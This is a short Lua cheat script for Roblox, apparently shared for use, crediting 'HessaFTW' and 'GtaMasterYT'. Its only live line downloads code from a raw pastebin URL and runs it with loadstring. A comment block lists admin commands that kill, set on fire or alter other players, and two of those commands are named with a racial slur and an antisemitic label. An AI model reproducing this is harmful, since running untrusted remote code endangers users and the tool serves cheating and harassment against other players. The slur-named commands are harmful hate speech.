--Thanks To HessaFTW
--Hessa Is the one that made this compalation and put all cmd list on bottem
--Have eny scripts that arent in here send them to HessaFTW and he will test and put in for next update


loadstring(Raindrop:DownloadString('http://pastebin.com/raw/11pCnmMV'))()

-Prefix is " - "

--[[
BCDAdmin by GtaMasterYT
Credits to: Hinata Shoyo and GtaMasterYT
Thanks for using

ALL CMDS
nigger [Player]
Jew [Player]
changestat [Player] [Stat name] [Number you want it to be]
createteam [Name U want]
maketeam [Team To join]
kill [player]
ff [player]
unff [player]
fire [player]
nofire [player
smoke [player]
nosmoke [player]
Not working -  duck [player]
ws [player] [speed amount]
jp [player] [hight/jump amount]
sit [player]
jump [player]
Not working [kick]
btools [player]
music [ID]
stopmusic
char [Char ID] --admin Char 1311
fogend [amount]
fogstart [amount]
fogcoler [Number] [Number] [Number]
]]--

--[[
Thanks for useing BCD
Enjoy your game
]]--